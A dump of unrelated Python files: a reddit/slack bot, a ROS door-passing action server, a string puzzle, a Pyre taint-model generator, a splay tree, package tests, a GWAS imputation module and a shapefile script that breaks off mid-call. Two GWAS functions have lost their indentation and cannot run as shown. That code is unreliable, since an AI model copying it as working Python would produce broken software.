        return None  # there is no reliable way to check if target is vulnerable
|
from match import match
from reddit import reddit
from freeRotation import freeRotation
from email_me import email_me
from twitch import twitch
from slack import slack
import time
class index:
    """Wires together the bot's data sources and publishes sidebar updates."""

    def __init__(self):
        # One instance of each integration; order mirrors the original setup.
        self.match = match()
        self.reddit = reddit()
        self.email_me = email_me()
        self.twitch = twitch()
        self.freeRotation = freeRotation()
        self.slack = slack()

    def run(self):
        """Gather match/stream/rotation data, then post to reddit and slack."""
        self.match.getMatches()
        formatted_matches = self.match.formatMatches()
        live_streams = self.twitch.getStreams()
        rotation = self.freeRotation.buildRotation()
        # self.reddit.setup()
        self.reddit.connect()
        self.reddit.updateSidebar(formatted_matches, live_streams, rotation)
        self.slack.postToSlack(formatted_matches, live_streams, rotation)
        # Email notification is currently disabled:
        # self.email_me.populate_email('Heroes Bot Posted', matches)
        # self.email_me.send_email()
        # self.sidebar.run()
# Run the bot once when executed directly.
if __name__ == '__main__':
    bot = index()
    bot.run()
|
#! /usr/bin/env python
import rospy
import actionlib
from actionlib_msgs.msg import GoalStatusArray, GoalStatus
from move_base_msgs.msg import MoveBaseAction
from door_pass.door_utils import DoorUtils
class DoorPass(object):
    """Action server that drives a robot through (possibly closed) doors.

    Exposes a MoveBaseAction server named 'doorPassing'.  For each goal it
    rotates towards the target pose, checks whether the door is open and, if
    so, attempts to drive through.  When the door is closed it temporarily
    disables monitored-navigation recovery behaviours so the supervising
    navigation stack fails fast, then restores them.
    """
    def __init__(self):
        # Motion/check tunables, all overridable via private ROS params.
        max_trans_vel=rospy.get_param("~max_trans_vel", 0.15)
        max_rot_vel=rospy.get_param("~max_rot_vel", 0.4)
        vel_scale_factor=rospy.get_param("~vel_scale_factor", 2)
        base_radius=rospy.get_param("~base_radius", 0.31)
        getting_further_counter_threshold=rospy.get_param("~getting_further_counter_threshold", 5)
        distance_to_success=rospy.get_param("~distance_to_success", 0.2)
        n_closed_door=rospy.get_param("~n_closed_door", 40)
        self.log_checks = rospy.get_param("~log_checks", False)
        self.door_utils=DoorUtils(max_trans_vel=max_trans_vel,
                                  max_rot_vel=max_rot_vel,
                                  vel_scale_factor=vel_scale_factor,
                                  base_radius=base_radius,
                                  getting_further_counter_threshold=getting_further_counter_threshold,
                                  distance_to_success=distance_to_success,
                                  n_closed_door = n_closed_door)
        # Track whether monitored navigation is currently executing a goal.
        self.mon_nav_status_sub=rospy.Subscriber("/monitored_navigation/status", GoalStatusArray, self.mon_nav_status_cb)
        self.door_as=actionlib.SimpleActionServer('doorPassing', MoveBaseAction, execute_cb = self.execute_cb, auto_start=False)
        self.door_as.start()
        self.door_as.register_preempt_callback(self.door_as_preempt_cb)
        self.mon_nav_executing=False
    def mon_nav_status_cb(self, data):
        """Record whether any monitored-navigation goal is currently ACTIVE."""
        result=False
        for goal in data.status_list:
            if goal.status==GoalStatus.ACTIVE:
                result=True
                break
        self.mon_nav_executing=result
    def execute_cb(self, goal):
        """Handle one door-passing goal (rotate, check door, pass or abort)."""
        self.door_utils.activate()
        # Re-read all params on every goal so they can be re-tuned at runtime.
        max_trans_vel=rospy.get_param("~max_trans_vel", 0.15)
        max_rot_vel=rospy.get_param("~max_rot_vel", 0.4)
        vel_scale_factor=rospy.get_param("~vel_scale_factor", 2)
        base_radius=rospy.get_param("~base_radius", 0.31)
        getting_further_counter_threshold=rospy.get_param("~getting_further_counter_threshold", 5)
        distance_to_success=rospy.get_param("~distance_to_success", 0.2)
        n_closed_door=rospy.get_param("~n_closed_door", 40)
        self.door_utils.set_params(max_trans_vel=max_trans_vel,
                                  max_rot_vel=max_rot_vel,
                                  vel_scale_factor=vel_scale_factor,
                                  base_radius=base_radius,
                                  getting_further_counter_threshold=getting_further_counter_threshold,
                                  distance_to_success=distance_to_success,
                                  n_closed_door=n_closed_door)
        target_pose=goal.target_pose.pose
        rospy.loginfo("Door pass action server calling rotate towards pose")
        self.door_utils.rotate_towards_pose(target_pose)
        # Honour preemption between each long-running step.
        if self.door_as.is_preempt_requested():
            self.finish_execution(GoalStatus.PREEMPTED)
            return
        rospy.loginfo("Door pass action server calling check door")
        door_open=self.door_utils.check_door(target_pose, log_to_mongo = self.log_checks)
        if self.door_as.is_preempt_requested():
            self.finish_execution(GoalStatus.PREEMPTED)
            return
        if door_open:
            rospy.loginfo("The door is open. Door pass action server is calling pass door")
            success=self.door_utils.pass_door(target_pose)
            if self.door_as.is_preempt_requested():
                self.finish_execution(GoalStatus.PREEMPTED)
                return
            if success:
                self.finish_execution(GoalStatus.SUCCEEDED)
                return
            else:
                self.finish_execution(GoalStatus.ABORTED)
                return
        else:
            rospy.loginfo("Door is closed. Disabling monitored navigation recoveries.")
            # Disable every recovery state so monitored navigation fails fast
            # instead of retrying against a closed door.
            current_mon_nav_recover_states=rospy.get_param("/monitored_navigation/recover_states/", {})
            for mon_nav_recover_state in current_mon_nav_recover_states:
                rospy.set_param("/monitored_navigation/recover_states/" + mon_nav_recover_state, [False,0])
            self.finish_execution(GoalStatus.ABORTED)
            #wait for mon nav to output failure and get recover states back on
            # Each iteration sleeps 0.1 s, so this waits at most ~3 seconds.
            timeout=0
            while self.mon_nav_executing and not self.door_as.is_preempt_requested() and timeout<30:
                rospy.loginfo("Waiting for monitored navigation to stop executing")
                rospy.sleep(0.1)
                timeout=timeout+1
            rospy.loginfo("Monitored navigation stopped executing. Resetting monitored navigation recoveries.")
            rospy.set_param("/monitored_navigation/recover_states/", current_mon_nav_recover_states)
            return
    def finish_execution(self, status):
        """Deactivate door utils and report the goal outcome to the client."""
        rospy.loginfo("Door passing finished with outcome " + GoalStatus.to_string(status))
        self.door_utils.deactivate()
        if status==GoalStatus.SUCCEEDED:
            self.door_as.set_succeeded()
        if status==GoalStatus.ABORTED:
            self.door_as.set_aborted()
        if status==GoalStatus.PREEMPTED:
            self.door_as.set_preempted()
    def door_as_preempt_cb(self):
        """Stop motion immediately when the action client preempts."""
        self.door_utils.deactivate()
    def main(self):
        """Block until ROS shutdown."""
        rospy.spin()
# Node entry point: start the door-passing action server.
if __name__ == '__main__':
    rospy.init_node("door_pass_node")
    passer=DoorPass()
    passer.main()
|
def has_ab_and_ba(s):
    """Return True if s contains "AB" and "BA" as non-overlapping substrings.

    Greedy check in both orders: take the first occurrence of one pattern,
    then look for the other starting two characters later.

    BUGFIX: the original counting formula
    count(AB)+count(BA)-count(ABA)-count(BAB) >= 2 is wrong — e.g. for
    "BABAB" it answers NO although BA at 0 and AB at 3 do not overlap.
    (Also ported from Python 2: raw_input/print statement -> Python 3.)
    """
    def _first_then(first, second):
        i = s.find(first)
        return i != -1 and s.find(second, i + 2) != -1
    return _first_then("AB", "BA") or _first_then("BA", "AB")


if __name__ == "__main__":
    print("YES" if has_ab_and_ba(input()) else "NO")
# Copyright (c) 2016-present, Facebook, Inc.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
# pyre-strict
import logging
from typing import Callable, Iterable, List
from .constructor_generator import gather_all_constructors_in_hierarchy
from .inspect_parser import extract_parameters, extract_qualified_name
from .model import AssignmentModel
from .model_generator import ModelGenerator
LOG: logging.Logger = logging.getLogger(__name__)
class ConstructorInitializedAttributeSourceGenerator(ModelGenerator[AssignmentModel]):
    """
    This Generator will taint the attributes initialized by the constructors of
    'classes_to_taint' and their descendants. Only descendants that have had
    their modules loaded at preprocessing time will be tainted. Models are
    generated on a best effort basis by assuming the name of the parameter will
    match the name of the attribute it is assigned to. This naive approach means
    this model generator will likely generate some invalid models.
    """

    def __init__(
        self,
        classes_to_taint: List[str],
        taint_annotation: str = "TaintSource[UserControlled]",
    ) -> None:
        self.classes_to_taint: List[str] = classes_to_taint
        self.taint_annotation: str = taint_annotation

    def gather_functions_to_model(self) -> Iterable[Callable[..., object]]:
        """Collect every constructor in the hierarchies of the tainted classes."""
        return gather_all_constructors_in_hierarchy(self.classes_to_taint)

    def compute_models(
        self, functions_to_model: Iterable[Callable[..., object]]
    ) -> Iterable[AssignmentModel]:
        """Yield one AssignmentModel per non-self constructor parameter."""
        for constructor in functions_to_model:
            qualified_name = extract_qualified_name(constructor)
            if not qualified_name:
                continue
            # Drop the trailing "__init__" segment to get the class path.
            owner_parts = qualified_name.split(".")[:-1]
            for parameter in extract_parameters(constructor):
                if parameter.name == "self":
                    continue
                # Best-effort: assume the attribute shares the parameter name.
                yield AssignmentModel(
                    target=".".join(owner_parts + [parameter.name]),
                    annotation=self.taint_annotation,
                )
|
class Node:
    """A splay-tree node holding a key/data pair plus parent/child links."""

    def __init__(self, key, data, parent=None, left=None, right=None):
        self.key, self.data = key, data
        self.parent, self.left, self.right = parent, left, right
class SplayTree:
    """Self-adjusting BST: every access splays the touched node to the root.

    Operations print their results / 'error' directly (this is a console
    exercise, not a library API).
    """
    def __init__(self):
        # Empty tree.
        self.root = None
    def zig(self, p):
        """Right-rotate around p: p's left child x moves up, p becomes x.right."""
        x = p.left
        p.left = x.right
        if x.right:
            x.right.parent = p
        x.parent = p.parent
        if not p.parent:
            self.root = x
        elif p == p.parent.right:
            p.parent.right = x
        else:
            p.parent.left = x
        x.right = p
        p.parent = x
    def zag(self, p):
        """Left-rotate around p: p's right child x moves up, p becomes x.left."""
        x = p.right
        p.right = x.left
        if x.left:
            x.left.parent = p
        x.parent = p.parent
        if not p.parent:
            self.root = x
        elif p == p.parent.right:
            p.parent.right = x
        else:
            p.parent.left = x
        x.left = p
        p.parent = x
    def splay(self, x):
        """Rotate x up to the root using zig/zag, zig-zig/zag-zag, zig-zag cases."""
        while x.parent:
            if not x.parent.parent:
                # x is a child of the root: single rotation.
                if x == x.parent.left:
                    self.zig(x.parent)
                else:
                    self.zag(x.parent)
            elif x == x.parent.left and x.parent == x.parent.parent.left:
                # zig-zig (left-left).
                self.zig(x.parent.parent)
                self.zig(x.parent)
            elif x == x.parent.right and x.parent == x.parent.parent.right:
                # zag-zag (right-right).
                self.zag(x.parent.parent)
                self.zag(x.parent)
            elif x == x.parent.right and x.parent == x.parent.parent.left:
                # zig-zag (left-right).
                self.zag(x.parent)
                self.zig(x.parent)
            else:
                # zag-zig (right-left).
                self.zig(x.parent)
                self.zag(x.parent)
    def add(self, key, data):
        """Insert a new key; on a duplicate, splay the existing node and raise."""
        x = self.root
        parent = None
        while x:
            if key == x.key:
                self.splay(x)
                raise(Exception)
            parent = x
            if key < x.key:
                x = x.left
            else:
                x = x.right
        temp = Node(key, data, parent=parent)
        if not parent:
            self.root = temp
        elif key < parent.key:
            parent.left = temp
        else:
            parent.right = temp
        self.splay(temp)
    def set(self, key, data):
        """Update the data of an existing key, splaying it; else print 'error'."""
        if not self.root:
            print('error')
            return
        temp = self.root
        parent = None
        while temp:
            if key == temp.key:
                temp.data = data
                self.splay(temp)
                return
            parent = temp
            if key < temp.key:
                temp = temp.left
            else:
                temp = temp.right
        # Key absent: splay the last visited node, then report the error.
        self.splay(parent)
        print('error')
    def delete(self, key):
        """Remove a key by splaying it and joining its two subtrees."""
        if not self.root:
            print('error')
            return
        x = self.root
        temp = parent = None
        while x:
            if key == x.key:
                temp = x
            parent = x
            if key < x.key:
                x = x.left
            else:
                x = x.right
        if not temp:
            # Key absent: splay the last visited node, then report the error.
            self.splay(parent)
            print('error')
            return
        self.splay(temp)
        # temp is now the root; detach its subtrees before joining them.
        leftChild = None
        rightChild = None
        if temp.right:
            rightChild = temp.right
            rightChild.parent = None
        if temp.left:
            leftChild = temp.left
            leftChild.parent = None
        if not leftChild:
            self.root = rightChild
            return
        if not rightChild:
            self.root = leftChild
            return
        # Splay the maximum of the left subtree to its root, then hang the
        # right subtree off it.
        while leftChild.right:
            leftChild = leftChild.right
        self.splay(leftChild)
        leftChild.right = rightChild
        rightChild.parent = leftChild
        self.root = leftChild
    def min(self):
        """Print and splay the minimum key/data pair."""
        if not self.root:
            print('error')
            return
        temp = self.root
        while temp.left:
            temp = temp.left
        print(temp.key, temp.data)
        self.splay(temp)
    def max(self):
        """Print and splay the maximum key/data pair."""
        if not self.root:
            print('error')
            return
        temp = self.root
        while temp.right:
            temp = temp.right
        print(temp.key, temp.data)
        self.splay(temp)
    def search(self, key):
        """Print '1 <data>' (and splay the node) if found, else '0'."""
        if not self.root:
            print('0')
            return
        temp = self.root
        parent = None
        while temp:
            if temp.key == key:
                print('1', temp.data)
                self.splay(temp)
                return
            elif key < temp.key:
                parent = temp
                temp = temp.left
            else:
                parent = temp
                temp = temp.right
        # Not found: splay the last visited node.
        self.splay(parent)
        print('0')
    def print(self):
        """Print the tree level by level; '_' marks a missing node.

        The BFS queue mixes Nodes with integers: an integer k appears to be a
        run-length marker for 2**k missing positions whose absent subtree
        doubles on the next level (k+1 is re-queued) — confirm before relying
        on this.
        """
        if not self.root:
            print('_')
            return
        queue = [self.root]
        index = 0
        height = 0
        out = ''
        while len(queue):
            # NOTE(review): these two prints emit the raw queue as a debug
            # trace in the output — presumably leftover debugging; verify.
            print(queue)
            print()
            lineLen = 1 << height
            _cycle = False
            for q in queue:
                if isinstance(q, Node):
                    _cycle = True
            if not _cycle:
                # No real nodes left: pad the current line and finish.
                if index != 0:
                    out += '_ ' * (lineLen - index)
                print(out[0:-1])
                return
            temp = queue.pop(0)
            if isinstance(temp, Node):
                # Queue children (0 is the sentinel for a missing child).
                if temp.left:
                    queue.append(temp.left)
                else:
                    queue.append(0)
                if temp.right:
                    queue.append(temp.right)
                else:
                    queue.append(0)
                index += 1
                out += '[' + str(temp.key) + ' ' + temp.data
                if not height:
                    out += ']\n'
                else:
                    # Non-root entries also show their parent's key.
                    if index != lineLen:
                        out += ' ' + str(temp.parent.key) + '] '
                    else:
                        out += ' ' + str(temp.parent.key) + ']\n'
            else:
                # Integer marker: a run of 2**temp missing positions.
                amount = 1 << temp
                out += '_ ' * amount
                index += amount
                queue.append(temp + 1)
                if index == lineLen:
                    out += '\n'
            if index == lineLen:
                # Line complete: move to the next level.
                index = 0
                height += 1
# Interactive driver: read one command per line from stdin until EOF.
tree = SplayTree()
keep_running = True
while keep_running:
    try:
        tokens = input().split(' ', 2)
        try:
            # Blank lines (possibly with a single trailing space) are ignored.
            if len(tokens) == 1 and tokens[0] == '':
                continue
            if len(tokens) == 2 and tokens[0] == '' and tokens[1] == '':
                continue
            op = tokens[0]
            if op == 'add':
                tree.add(int(tokens[1]), tokens[2])
            elif op == 'set':
                tree.set(int(tokens[1]), tokens[2])
            elif op == 'delete':
                tree.delete(int(tokens[1]))
            elif op == 'search':
                tree.search(int(tokens[1]))
            elif op == 'min':
                tree.min()
            elif op == 'max':
                tree.max()
            elif op == 'print':
                tree.print()
            else:
                raise(Exception)
        except Exception:
            # Malformed command: wrong arity, non-integer key, duplicate add...
            print('error')
            continue
    except Exception:
        # input() failed (EOF): stop the loop.
        keep_running = False
# noqa: F408, F401
import pytest
from opennem.settings.schema import OpennemSettings
def test_opennem_imports() -> None:
    """The top-level package imports cleanly and exposes its `core` subpackage."""
    try:
        import opennem
    except Exception:
        pytest.fail("Could not import main module")
    # BUGFIX: the original called hasattr() and discarded the result, so the
    # check asserted nothing.
    assert hasattr(opennem, "core")
def test_opennem_version() -> None:
    """The version string looks like a dotted semver-ish version."""
    import opennem

    version = opennem.__version__
    assert isinstance(version, str), "Version is a string"
    assert len(version) > 1, "Version is not empty"
    assert "." in version, "Version is somewhat versiony"
    assert len(version.split(".")) > 2, "Version is more versiony"
def test_opennem_path() -> None:
    """The package is a real package: it exposes a __path__ list."""
    import opennem
    assert hasattr(opennem, "__path__"), "Module has a path"
    assert isinstance(opennem.__path__, list), "Path is a list"  # type: ignore
def test_opennem_settings() -> None:
    """Importing the package wires up a settings object of the expected schema."""
    import opennem
    assert hasattr(opennem, "settings"), "We have settings"
    assert isinstance(opennem.settings, OpennemSettings), "Settings is an openem settings schema"
|
__author__ = "alvaro barbeira"
import logging
import pandas
import numpy
from . import SummaryInputation
from ..data_management import TextFileTools
from ..file_formats import Parquet
from ..file_formats.gwas import Utilities as GWASUtilities
from ..individual_data.Utilities import StudyBasedContext
from ..miscellaneous import Genomics
from ..miscellaneous import PandasHelpers
########################################################################################################################
class _Mixin:
    """Shared configuration holder for imputation contexts.

    Parses the GWAS dataframe once up front and exposes the tuning knobs
    (cutoff, regularization, frequency filter, palindromic-SNP policy)
    through simple accessors.
    """
    def __init__(self, gwas, cutoff, regularization, frequency_filter, standardise_dosages, keep_palindromic_imputation, use_palindromic_snps):
        # Pre-index the GWAS: chromosome -> position -> allele -> allele.
        self.gwas_data = _parse_gwas(gwas)
        self.cutoff = cutoff
        self.regularization = regularization
        self.frequency_filter = frequency_filter
        self._standardise_dosages = standardise_dosages
        self._keep_palindromic_imputation = keep_palindromic_imputation
        self._use_palindromic_snps = use_palindromic_snps
    def get_gwas_slice(self, variants_metadata=None, variant=None):
        """Return GWAS rows matching the given metadata (or a single variant)."""
        return _gwas_for_slice(self.gwas_data, variants_metadata, variant)
    # Plain accessors consumed by the imputation driver.
    def get_cutoff(self): return self.cutoff
    def get_regularization(self): return self.regularization
    def get_freq_filter(self): return self.frequency_filter
    def standardise_dosages(self): return self._standardise_dosages
    def keep_palindromic_imputation(self): return self._keep_palindromic_imputation
    def use_palindromic_snps(self): return self._use_palindromic_snps
class VariantContext(StudyBasedContext, _Mixin, SummaryInputation._VariantContext):
    """Per-variant imputation context over a reference study and a GWAS."""
    def __init__(self, study, window, gwas, cutoff, regularization, frequency_filter, standardise_dosages, specific_target_variants=None, keep_palindromic_imputation=None, use_palindromic_snps=None):
        super().__init__(study, None, window)
        _Mixin.__init__(self, gwas, cutoff, regularization, frequency_filter, standardise_dosages, keep_palindromic_imputation, use_palindromic_snps)
        # Default to imputing every variant in the study unless a specific
        # target list is supplied (e.g. a sub-batch).
        self.target_variants_metadata = specific_target_variants if specific_target_variants is not None else study.get_variants_metadata()
    def get_target_variants_metadata(self):
        """Metadata of the variants this context should impute."""
        return self.target_variants_metadata
class CachingVariantContext(VariantContext):
    """VariantContext that memoises genotype fetches across requests."""
    def __init__(self, study, window, gwas, cutoff, regularization, frequency_filter, standardise_dosages, specific_target_variants=None, keep_palindromic_imputation=None, use_palindromic_snps=None):
        super().__init__(study, window, gwas, cutoff, regularization, frequency_filter, standardise_dosages, specific_target_variants, keep_palindromic_imputation, use_palindromic_snps)
        # variant id -> raw dosage values; grows without bound.
        self.cache = {}
    def get_variants(self, variants):
        """Fetch dosages for `variants`, reusing previously fetched values."""
        return _get_variants_cached(variants, self.study, self.cache)
def _get_variants_cached(variants, study, cache):
req = [x for x in variants if not x in cache]
if len(req):
v = study.get_variants(req)
for k in v:
cache[k] = v[k].values
return {k:cache[k] for k in variants}
########################################################################################################################
class RegionContext(StudyBasedContext, _Mixin, SummaryInputation._RegionContext):
    """Per-region imputation context over a reference study and a GWAS."""
    def __init__(self, study, window, gwas, cutoff, regularization, frequency_filter, regions, standardise_dosages=None, keep_palindromic_imputation=None, use_palindromic_snps=None):
        super().__init__(study, None, window)
        _Mixin.__init__(self, gwas, cutoff, regularization, frequency_filter, standardise_dosages, keep_palindromic_imputation, use_palindromic_snps)
        # Dataframe of (chromosome, start, end) regions to process.
        self.target_regions = regions
    def get_target_regions(self):
        """Regions this context should impute."""
        return self.target_regions
########################################################################################################################
def _parse_gwas(gwas):
gwas = gwas[~gwas.zscore.isna()]
logging.log(9, "Parsing GWAS")
g = {}
for i,t in enumerate(gwas.itertuples()):
if t.zscore == "NA":
continue
if not t.chromosome in g:
g[t.chromosome] = {}
c = g[t.chromosome]
#Yeah, here is where pandas' reading the position column as a float bites us
if numpy.isnan(t.position): continue
_pos = int(t.position)
if not _pos in c:
c[_pos] = {}
c = c[_pos]
z = float(t.zscore)
c[t.effect_allele] = {}
c[t.effect_allele][t.non_effect_allele] = (z, t.variant_id)
c[t.non_effect_allele] = {}
c[t.non_effect_allele][t.effect_allele] = (-z, t.variant_id)
return g
def _gwas_for_slice(gwas_data, variants_metadata, variant):
    """Look up measured GWAS entries for the given variants.

    Accepts either a metadata dataframe or a single variant (from which a
    one-row frame is built).  Returns a dataframe with the
    SummaryInputation.Results fields; matched rows are tagged "measured".
    """
    if variants_metadata is None and variant is not None:
        # Build a one-row metadata frame from the single variant.
        variants_metadata = pandas.DataFrame(
            [(variant.id, variant.chromosome, variant.position,
              variant.non_effect_allele, variant.effect_allele,
              variant.effect_allele_frequency)],
            columns=["id", "chromosome", "position", "non_effect_allele",
                     "effect_allele", "effect_allele_frequency"])
    rows = []
    for entry in variants_metadata.itertuples():
        chrom = gwas_data.get("chr{}".format(entry.chromosome))
        if chrom is None:
            continue
        at_position = chrom.get(entry.position)
        if at_position is None:
            continue
        by_effect = at_position.get(entry.effect_allele)
        if by_effect is None:
            continue
        if entry.non_effect_allele not in by_effect:
            continue
        zscore, gwas_id = by_effect[entry.non_effect_allele]
        # Alternative would be the study's rsid; currently the GWAS id is used.
        rows.append((gwas_id, entry.id, entry.chromosome, entry.position,
                     entry.effect_allele, entry.non_effect_allele,
                     entry.effect_allele_frequency, zscore, None, "measured"))
    return pandas.DataFrame(rows, columns=SummaryInputation.Results._fields)
def load_gwas(args, use_specific_targets):
    """Watch out! Pandas parser on occasion reads the column `position` as integer. Yikes."""
    columns = ["variant_id", "panel_variant_id", "chromosome", "position",
               "non_effect_allele", "effect_allele", "zscore"]
    if use_specific_targets is None:
        # No whitelist: read the whole file (optionally one chromosome).
        logging.info("opening gwas file")
        gwas = pandas.read_table(args.gwas_file, usecols=columns)[columns]
        if args.chromosome:
            gwas = gwas.loc[gwas.chromosome == "chr{}".format(args.chromosome)]
    else:
        # Stream the file through a chromosome/position filter so only rows
        # near the targets are kept.
        logging.info("Acquiring filter tree for %d targets", use_specific_targets.shape[0])
        position_tree = GWASUtilities.get_chromosome_position_tree(use_specific_targets)
        row_filter = GWASUtilities.get_filter(position_tree)
        logging.info("Processing gwas source")
        gwas = TextFileTools.load_dataframe(args.gwas_file, additional_filter=row_filter, columns=columns)[columns]
    logging.log(9, "Loaded %d GWAS variants", gwas.shape[0])
    # Discarding ambiguous (palindromic) variants is deliberately left to the
    # imputation step.
    return gwas
def trim_variant_metadata(args, vm, use_specific_targets):
    """Restrict variant metadata `vm` to windows around the targets.

    For each chromosome present in the targets, keeps metadata entries within
    [min target position - window, max target position + window].
    """
    pieces = []
    for chromosome in {c for c in use_specific_targets.chromosome}:
        on_chromosome = use_specific_targets[use_specific_targets.chromosome == chromosome]
        low = on_chromosome.position.min() - args.window
        high = on_chromosome.position.max() + args.window
        pieces.append(Genomics.entries_for_window(chromosome, low, high, vm))
    return pandas.concat(pieces)
def load_study(args):
    """Load the reference genotype study from parquet files.

    Renames allele columns to the effect/non-effect convention used by the
    GWAS data and keeps only the metadata columns downstream code needs.
    """
    study = Parquet.study_from_parquet(args.parquet_genotype, args.parquet_genotype_metadata, chromosome=args.chromosome)
    vm = study.variant_metadata
    # allele_1 is treated as the effect allele; rename to match GWAS naming.
    vm.rename(columns={"allele_0":"non_effect_allele", "allele_1":"effect_allele", "allele_1_frequency":"effect_allele_frequency"}, inplace=True)
    study.variant_metadata = vm[['chromosome', 'position', 'id', 'non_effect_allele', 'effect_allele', 'effect_allele_frequency', 'rsid']]
    return study
########################################################################################################################
def context_from_args(args):
    """Build a per-variant imputation context from parsed CLI arguments."""
    logging.info("Creating context by variant")
    logging.info("Loading study")
    study = load_study(args)
    use_specific_targets = None
    if args.sub_batches and args.sub_batch is not None:
        # Restrict both the targets and the study metadata to this sub-batch
        # (plus a surrounding window).
        logging.log(9, "Selecting targets from sub-batches")
        use_specific_targets = PandasHelpers.sub_batch(study.variant_metadata, args.sub_batches, args.sub_batch)
        study.variant_metadata = trim_variant_metadata(args, study.variant_metadata, use_specific_targets)
    logging.info("Loading gwas")
    gwas = load_gwas(args, use_specific_targets)
    context_class = CachingVariantContext if args.cache_variants else VariantContext
    return context_class(study, args.window, gwas, args.cutoff, args.regularization,
                         args.frequency_filter, args.standardise_dosages, use_specific_targets)
########################################################################################################################
def load_region(args, study):
    """Load target regions and derive the GWAS variant whitelist they imply.

    Reads the region file (chr/start/stop), optionally restricts it by
    chromosome, containing position and sub-batch, and -- when any subsetting
    was requested -- collects the study variants within args.window of any
    region as the whitelist.

    Returns (regions, use_specific_targets); the latter is None when no
    subsetting was requested.
    """
    regions = pandas.read_table(args.by_region_file).rename(columns={"chr":"chromosome", "stop":"end"})
    regions = regions.dropna()
    # Strip the "chr" prefix and keep the numeric chromosome id.
    regions = regions.assign(chromosome = regions.chromosome.str.split("chr").str.get(1).astype(numpy.int32))
    use_specific_targets = None
    if args.chromosome:
        logging.log(9, "Selecting target regions with specific chromosome")
        regions = regions.loc[regions.chromosome == args.chromosome]
        # `containing` only applies in combination with a chromosome filter.
        if args.containing:
            logging.log(9, "Selecting target regions with specific position")
            regions = regions[(regions.chromosome == args.chromosome) & (regions.start <= args.containing) & (args.containing <= regions.end)]
        regions = regions.reset_index(drop=True)
    if args.sub_batches and args.sub_batch is not None:
        logging.log(9, "Selecting target regions from sub-batches")
        regions = PandasHelpers.sub_batch(regions, args.sub_batches, args.sub_batch)
    if args.chromosome or (args.sub_batches and args.sub_batch is not None):
        logging.log(9, "generating GWAS whitelist")
        use_specific_targets = []
        for region in regions.itertuples():
            # Pad each region by the context window on both sides.
            w = Genomics.entries_for_window(region.chromosome, region.start - args.window, region.end + args.window, study.variant_metadata)
            use_specific_targets.append(w)
        use_specific_targets = pandas.concat(use_specific_targets).drop_duplicates()
    return regions, use_specific_targets
def context_by_region_from_args(args):
    """Build a RegionContext from command-line arguments.

    Loads the study, derives the target regions (and the GWAS whitelist
    they imply), loads the GWAS restricted to those targets, and wires
    everything into a RegionContext.
    """
    # Fixed copy/paste: this is the by-region entry point, not by-variant.
    logging.info("Creating context by region")
    logging.info("Loading study")
    study = load_study(args)
    logging.info("Loading regions")
    regions, use_specific_targets = load_region(args, study)
    logging.info("Loading gwas")
    gwas = load_gwas(args, use_specific_targets)
    context = RegionContext(study, args.window, gwas, args.cutoff, args.regularization, args.frequency_filter, regions,
                            args.standardise_dosages, args.keep_palindromic_imputation, args.use_palindromic_snps)
    return context
|
# """
# Special cases tests for ceil.
#
# These tests are generated from the special cases listed in the spec.
#
# NOTE: This file is generated automatically by the generate_stubs.py script. Do
# not modify it directly.
# """
#
# from ..array_helpers import NaN, assert_exactly_equal, exactly_equal, infinity, isintegral, zero
# from ..hypothesis_helpers import numeric_arrays
# from .._array_module import ceil
#
# from hypothesis import given
#
#
# @given(numeric_arrays)
# def test_ceil_special_cases_one_arg_equal_1(arg1):
# """
# Special case test for `ceil(x, /)`:
#
# - If `x_i` is already integer-valued, the result is `x_i`.
#
# """
# res = ceil(arg1)
# mask = isintegral(arg1)
# assert_exactly_equal(res[mask], (arg1)[mask])
#
#
# @given(numeric_arrays)
# def test_ceil_special_cases_one_arg_equal_2(arg1):
# """
# Special case test for `ceil(x, /)`:
#
# - If `x_i` is `+infinity`, the result is `+infinity`.
#
# """
# res = ceil(arg1)
# mask = exactly_equal(arg1, infinity(arg1.shape, arg1.dtype))
# assert_exactly_equal(res[mask], (infinity(arg1.shape, arg1.dtype))[mask])
#
#
# @given(numeric_arrays)
# def test_ceil_special_cases_one_arg_equal_3(arg1):
# """
# Special case test for `ceil(x, /)`:
#
# - If `x_i` is `-infinity`, the result is `-infinity`.
#
# """
# res = ceil(arg1)
# mask = exactly_equal(arg1, -infinity(arg1.shape, arg1.dtype))
# assert_exactly_equal(res[mask], (-infinity(arg1.shape, arg1.dtype))[mask])
#
#
# @given(numeric_arrays)
# def test_ceil_special_cases_one_arg_equal_4(arg1):
# """
# Special case test for `ceil(x, /)`:
#
# - If `x_i` is `+0`, the result is `+0`.
#
# """
# res = ceil(arg1)
# mask = exactly_equal(arg1, zero(arg1.shape, arg1.dtype))
# assert_exactly_equal(res[mask], (zero(arg1.shape, arg1.dtype))[mask])
#
#
# @given(numeric_arrays)
# def test_ceil_special_cases_one_arg_equal_5(arg1):
# """
# Special case test for `ceil(x, /)`:
#
# - If `x_i` is `-0`, the result is `-0`.
#
# """
# res = ceil(arg1)
# mask = exactly_equal(arg1, -zero(arg1.shape, arg1.dtype))
# assert_exactly_equal(res[mask], (-zero(arg1.shape, arg1.dtype))[mask])
#
#
# @given(numeric_arrays)
# def test_ceil_special_cases_one_arg_equal_6(arg1):
# """
# Special case test for `ceil(x, /)`:
#
# - If `x_i` is `NaN`, the result is `NaN`.
#
# """
# res = ceil(arg1)
# mask = exactly_equal(arg1, NaN(arg1.shape, arg1.dtype))
# assert_exactly_equal(res[mask], (NaN(arg1.shape, arg1.dtype))[mask])
|
#!/usr/bin/env python
# Filename: get_intersection
"""
introduction: get intersection polygons
authors: Huang Lingcao
email:huanglingcao@gmail.com
add time: 1 March, 2019
"""
import os,sys
from optparse import OptionParser
HOME = os.path.expanduser('~')
# path of DeeplabforRS
codes_dir2 = HOME + '/codes/PycharmProjects/DeeplabforRS'
sys.path.insert(0, codes_dir2)
import basic_src.basic as basic
import vector_features
def main(options, args):
    """Compute the intersection of two polygon shapefiles and log the result."""
    shp_a, shp_b = args[0], args[1]
    out_path = options.output
    fields = options.copy_fields
    if fields is not None:
        fields = fields.split(',')
    ok = vector_features.get_intersection_of_polygon_polygon(shp_a, shp_b, out_path, copy_field=fields)
    if ok:
        basic.outputlogMessage('get intersection, save to %s' % out_path)
    else:
        basic.outputlogMessage('get intersection failed')
if __name__ == "__main__":
    usage = "usage: %prog [options] shp_file1 shp_file2"
    parser = OptionParser(usage=usage, version="1.0 2019-3-1")
    parser.description = 'Introduction: get intersection polygons'
    parser.add_option("-o", "--output",
                      action="store", dest="output",
                      help="the output")
    parser.add_option("-c", "--copy_fields",
                      action="store", dest="copy_fields",
